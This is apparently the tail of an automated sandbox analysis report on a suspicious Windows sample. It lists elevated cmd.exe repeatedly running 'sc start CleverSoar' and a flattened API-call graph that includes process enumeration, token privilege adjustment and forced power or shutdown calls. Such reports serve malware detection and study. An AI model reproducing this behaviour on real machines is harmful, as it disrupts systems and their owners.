                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:73
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:74
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:75
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:76
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:77
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:78
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:79
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:80
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:81
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:82
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:83
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:84
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:85
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:86
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:87
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:88
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:89
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:90
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:91
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:92
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:93
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:94
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:95
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:96
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:97
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:98
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:99
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:100
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:101
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:102
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:103
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:104
                                    Start time:22:31:06
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:105
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:106
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:107
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:108
                                    Start time:22:31:07
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:266
                                    Start time:22:31:13
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false


                                      Execution Graph

                                      Execution Coverage:1.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.2%
                                      Total number of Nodes:731
                                      Total number of Limit Nodes:9
                                      [execution_graph: flattened node/edge dump of the rendered call graph. Only function addresses (0x6c9e.... to 0x6cb8....), node identifiers and the resolved API names attached to nodes survive extraction, for example GetLastError, ExitThread, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, GetPEB, ReadFile, ReadConsoleW, GetConsoleMode, GetCurrentProcess, TerminateProcess, GetCurrentThread, NtSetInformationThread, CreateFileA, CloseHandle, OpenSCManagerA, CreateToolhelp32Snapshot, CreateProcessA, FindFirstFileA, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, NtInitiatePowerAction, ExitWindowsEx, Sleep, IsProcessorFeaturePresent and RaiseException. The graph layout itself is not recoverable from the extracted text.]
6cb5e0e2 FindClose 97735->97737 97736->97568 97737->97735 97739 6cb68846 97738->97739 97740 6cb688be OpenServiceA 97739->97740 97741 6cb68922 97739->97741 97740->97739 97741->97612 97747 6cb50893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 97742->97747 97743 6cb54e71 CloseHandle 97743->97747 97744 6cb53bd1 CloseHandle 97744->97747 97745 6c9f37cb 97749 6cb69450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 97745->97749 97746 6cb3cea0 WriteFile ReadFile WriteFile WriteFile 97746->97747 97747->97743 97747->97744 97747->97745 97747->97746 97832 6cb3c390 97747->97832 97749->97579 97751 6ca06bd5 97750->97751 97843 6ca32020 97751->97843 97753 6ca06c68 97754 6cb6a133 std::_Facet_Register 4 API calls 97753->97754 97755 6ca06ca0 97754->97755 97860 6cb6aa17 97755->97860 97757 6ca06cb4 97872 6ca31d90 97757->97872 97759 6ca06d8e 97759->97624 97762 6ca06dc8 97880 6ca326e0 24 API calls 4 library calls 97762->97880 97764 6ca06dda 97881 6cb6ca69 RaiseException 97764->97881 97766 6ca06def 97882 6ca2e010 67 API calls 97766->97882 97768 6ca06e0f 97768->97624 97770 6ca06e9f 97769->97770 97773 6ca06eb3 97770->97773 98245 6ca33560 32 API calls std::_Xinvalid_argument 97770->98245 97774 6ca06f5b 97773->97774 98247 6ca32250 30 API calls 97773->98247 98248 6ca326e0 24 API calls 4 library calls 97773->98248 98249 6cb6ca69 RaiseException 97773->98249 97775 6ca06f6e 97774->97775 98246 6ca337e0 32 API calls std::_Xinvalid_argument 97774->98246 97775->97624 97780 6ca0709e 97779->97780 97783 6ca070d1 97779->97783 98250 6ca301f0 97780->98250 97782 6ca07183 97782->97612 97783->97782 98254 6ca32250 30 API calls 97783->98254 97786 6cb74208 67 API calls 97786->97783 97787 6ca071ae 98255 6ca32340 24 API calls 97787->98255 97789 6ca071be 98256 6cb6ca69 RaiseException 97789->98256 97791 6ca071c9 97792->97612 97793->97607 97795 6cb68770 97794->97795 97796 6cb687b0 WaitForSingleObject CloseHandle CloseHandle 97795->97796 97797 6cb687a4 
97795->97797 97796->97795 97797->97616 97798->97628 97800 6cb690a7 97799->97800 98302 6cb696e0 97800->98302 97802 6cb690b8 97803 6ca06ba0 104 API calls 97802->97803 97813 6cb690dc 97803->97813 97804 6cb69157 98354 6ca2e010 67 API calls 97804->98354 97806 6cb6918f std::ios_base::_Ios_base_dtor 98355 6ca2e010 67 API calls 97806->98355 97809 6cb69144 98339 6cb69280 97809->98339 97812 6cb691d2 std::ios_base::_Ios_base_dtor 97812->97667 97813->97804 97813->97809 98321 6cb69a30 97813->98321 98329 6ca43010 97813->98329 97814 6cb6914c 97815 6ca07090 77 API calls 97814->97815 97815->97804 97816->97659 97822 6cb68966 std::locale::_Setgloballocale 97817->97822 97818 6cb68a14 CloseHandle 97818->97822 97819 6cb68a64 Process32NextW 97819->97822 97820 6cb68a45 Process32FirstW 97820->97822 97821 6cb68a96 97821->97587 97822->97818 97822->97819 97822->97820 97822->97821 97823->97604 97824->97624 97826->97586 97827->97720 97828->97727 97829->97729 97830->97722 97831->97725 97833 6cb3c3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 97832->97833 97834 6cb3ce3c 97833->97834 97835 6cb3cab9 CreateFileA 97833->97835 97837 6cb3b4d0 97833->97837 97834->97747 97835->97833 97839 6cb3b4e3 __wsopen_s std::locale::_Setgloballocale 97837->97839 97838 6cb3c206 WriteFile 97838->97839 97839->97838 97840 6cb3b619 WriteFile 97839->97840 97841 6cb3c377 97839->97841 97842 6cb3bc23 ReadFile 97839->97842 97840->97839 97841->97833 97842->97839 97844 6cb6a133 std::_Facet_Register 4 API calls 97843->97844 97845 6ca3207e 97844->97845 97846 6cb6aa17 43 API calls 97845->97846 97847 6ca32092 97846->97847 97883 6ca32f60 42 API calls 4 library calls 97847->97883 97849 6ca320c8 97850 6ca3210d 97849->97850 97851 6ca32136 97849->97851 97852 6ca32120 97850->97852 97884 6cb6a67e 9 API calls 2 library calls 97850->97884 97885 6ca32250 30 API calls 97851->97885 97852->97753 97855 6ca3215b 97886 6ca32340 24 API calls 97855->97886 97857 6ca32171 97887 6cb6ca69 RaiseException 97857->97887 97859 6ca3217c 97859->97753 97861 
6cb6aa23 __EH_prolog3 97860->97861 97888 6cb6a5a5 97861->97888 97865 6cb6aa41 97902 6cb6aaaa 39 API calls std::locale::_Setgloballocale 97865->97902 97867 6cb6aa9c 97867->97757 97869 6cb6aa49 97903 6cb6a8a1 HeapFree GetLastError _Yarn ___std_exception_destroy 97869->97903 97871 6cb6aa5f 97894 6cb6a5d6 97871->97894 97873 6ca06d5d 97872->97873 97874 6ca31ddc 97872->97874 97873->97759 97879 6ca32250 30 API calls 97873->97879 97908 6cb6ab37 97874->97908 97878 6ca31e82 97879->97762 97880->97764 97881->97766 97882->97768 97883->97849 97884->97852 97885->97855 97886->97857 97887->97859 97889 6cb6a5b4 97888->97889 97891 6cb6a5bb 97888->97891 97904 6cb73abd 6 API calls std::_Lockit::_Lockit 97889->97904 97892 6cb6a5b9 97891->97892 97905 6cb6bc7b EnterCriticalSection 97891->97905 97892->97871 97901 6cb6a920 6 API calls 2 library calls 97892->97901 97895 6cb6a5e0 97894->97895 97896 6cb73acb 97894->97896 97897 6cb6a5f3 97895->97897 97906 6cb6bc89 LeaveCriticalSection 97895->97906 97907 6cb73aa6 LeaveCriticalSection 97896->97907 97897->97867 97899 6cb73ad2 97899->97867 97901->97865 97902->97869 97903->97871 97904->97892 97905->97892 97906->97897 97907->97899 97909 6cb6ab40 97908->97909 97910 6ca31dea 97909->97910 97917 6cb7343a 97909->97917 97910->97873 97916 6cb6fc53 18 API calls __Getctype 97910->97916 97912 6cb6ab8c 97912->97910 97928 6cb73148 65 API calls 97912->97928 97914 6cb6aba7 97914->97910 97929 6cb74208 97914->97929 97916->97878 97918 6cb73445 __wsopen_s 97917->97918 97919 6cb73458 97918->97919 97920 6cb73478 97918->97920 97954 6cb73810 18 API calls __Getctype 97919->97954 97924 6cb73468 97920->97924 97940 6cb7e4fc 97920->97940 97924->97912 97928->97914 97930 6cb74214 __wsopen_s 97929->97930 97931 6cb74233 97930->97931 97932 6cb7421e 97930->97932 97937 6cb7422e 97931->97937 98135 6cb6fc99 EnterCriticalSection 97931->98135 98150 6cb73810 18 API calls __Getctype 97932->98150 97934 6cb74250 98136 6cb7428c 97934->98136 97937->97910 97938 6cb7425b 98151 6cb74282 
LeaveCriticalSection 97938->98151 97941 6cb7e508 __wsopen_s 97940->97941 97956 6cb73a8f EnterCriticalSection 97941->97956 97943 6cb7e516 97957 6cb7e5a0 97943->97957 97948 6cb7e662 97949 6cb7e781 97948->97949 97981 6cb7e804 97949->97981 97952 6cb734bc 97955 6cb734e5 LeaveCriticalSection 97952->97955 97954->97924 97955->97924 97956->97943 97958 6cb7e5c3 97957->97958 97959 6cb7e61b 97958->97959 97966 6cb7e523 97958->97966 97974 6cb6fc99 EnterCriticalSection 97958->97974 97975 6cb6fcad LeaveCriticalSection 97958->97975 97976 6cb7a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 97959->97976 97962 6cb7e624 97977 6cb77eab HeapFree GetLastError _free 97962->97977 97964 6cb7e62d 97964->97966 97978 6cb7a30f 6 API calls std::_Lockit::_Lockit 97964->97978 97971 6cb7e55c 97966->97971 97967 6cb7e64c 97979 6cb6fc99 EnterCriticalSection 97967->97979 97970 6cb7e65f 97970->97966 97980 6cb73aa6 LeaveCriticalSection 97971->97980 97973 6cb73493 97973->97924 97973->97948 97974->97958 97975->97958 97976->97962 97977->97964 97978->97967 97979->97970 97980->97973 97983 6cb7e823 97981->97983 97982 6cb7e84b 97992 6cb7e96b 97982->97992 97998 6cb87598 37 API calls __Getctype 97982->97998 97983->97982 97984 6cb7e836 97983->97984 97997 6cb73810 18 API calls __Getctype 97984->97997 97986 6cb7e797 97986->97952 97994 6cb876ce 97986->97994 97989 6cb7e9bb 97989->97992 97999 6cb87598 37 API calls __Getctype 97989->97999 97991 6cb7e9d9 97991->97992 98000 6cb87598 37 API calls __Getctype 97991->98000 97992->97986 98001 6cb73810 18 API calls __Getctype 97992->98001 98002 6cb87a86 97994->98002 97997->97986 97998->97989 97999->97991 98000->97992 98001->97986 98004 6cb87a92 __wsopen_s 98002->98004 98003 6cb87a99 98020 6cb73810 18 API calls __Getctype 98003->98020 98004->98003 98005 6cb87ac4 98004->98005 98011 6cb876ee 98005->98011 98010 6cb876e9 98010->97952 98022 6cb73dbb 98011->98022 98017 6cb87724 98018 6cb87756 98017->98018 98062 6cb77eab HeapFree GetLastError 
_free 98017->98062 98021 6cb87b1b LeaveCriticalSection __wsopen_s 98018->98021 98020->98010 98021->98010 98063 6cb6f3db 98022->98063 98025 6cb73ddf 98027 6cb6f4e6 98025->98027 98072 6cb6f53e 98027->98072 98029 6cb6f4fe 98029->98017 98030 6cb8775c 98029->98030 98087 6cb87bdc 98030->98087 98035 6cb8778e __dosmaperr 98035->98017 98037 6cb87882 GetFileType 98038 6cb8788d GetLastError 98037->98038 98039 6cb878d4 98037->98039 98116 6cb730e2 __dosmaperr _free 98038->98116 98117 6cb84ea0 SetStdHandle __dosmaperr __wsopen_s 98039->98117 98040 6cb87857 GetLastError 98040->98035 98042 6cb87805 98042->98037 98042->98040 98115 6cb87b47 CreateFileW 98042->98115 98043 6cb8789b CloseHandle 98043->98035 98059 6cb878c4 98043->98059 98046 6cb8784a 98046->98037 98046->98040 98047 6cb878f5 98048 6cb87941 98047->98048 98118 6cb87d56 70 API calls 2 library calls 98047->98118 98052 6cb87948 98048->98052 98132 6cb87e00 70 API calls 2 library calls 98048->98132 98051 6cb87976 98051->98052 98053 6cb87984 98051->98053 98119 6cb7f015 98052->98119 98053->98035 98055 6cb87a00 CloseHandle 98053->98055 98133 6cb87b47 CreateFileW 98055->98133 98057 6cb87a2b 98058 6cb87a35 GetLastError 98057->98058 98057->98059 98060 6cb87a41 __dosmaperr 98058->98060 98059->98035 98134 6cb84e0f SetStdHandle __dosmaperr __wsopen_s 98060->98134 98062->98018 98064 6cb6f3f2 98063->98064 98065 6cb6f3fb 98063->98065 98064->98025 98071 6cb7a0c5 5 API calls std::_Lockit::_Lockit 98064->98071 98065->98064 98066 6cb780a2 __Getctype 37 API calls 98065->98066 98067 6cb6f41b 98066->98067 98068 6cb78618 __Getctype 37 API calls 98067->98068 98069 6cb6f431 98068->98069 98070 6cb78645 __cftoe 37 API calls 98069->98070 98070->98064 98071->98025 98073 6cb6f566 98072->98073 98074 6cb6f54c 98072->98074 98075 6cb6f58c 98073->98075 98076 6cb6f56d 98073->98076 98077 6cb6f4cc __wsopen_s HeapFree GetLastError 98074->98077 98079 6cb77f33 __fassign MultiByteToWideChar 98075->98079 98078 6cb6f556 __dosmaperr 98076->98078 98080 6cb6f48d 
